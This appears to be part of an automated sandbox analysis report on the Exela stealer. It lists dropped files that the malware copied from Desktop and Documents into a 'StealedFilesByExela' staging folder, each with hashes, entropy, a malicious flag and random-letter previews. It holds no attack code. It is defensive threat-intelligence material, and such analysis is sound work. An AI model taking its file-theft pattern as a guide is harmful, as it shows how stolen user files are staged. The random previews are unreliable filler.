                                                                                                  Preview:DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\HMPPSXQPQV.pdf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698711683401115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                  MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                  SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                  SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                  SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                  Malicious:true
                                                                                                  Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LFOPODGVOH.docx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698393795110914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                  MD5:7C5655873C22D2522B13B34841F82038
                                                                                                  SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                  SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                  SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                  Malicious:false
                                                                                                  Preview:LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LIJDSFKJZG.docx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LIJDSFKJZG.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:true
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\SNIPGPPREP.jpg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701796197804446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                  MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                  SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                  SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                  SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                  Malicious:false
                                                                                                  Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VWDFPKGDUF.png

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696835919052288
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                  MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                  SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                  SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                  SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                  Malicious:false
                                                                                                  Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\WSHEJMDVQC.mp3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\WSHEJMDVQC.pdf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\AQRFEVRTGL.jpg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\AQRFEVRTGL.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
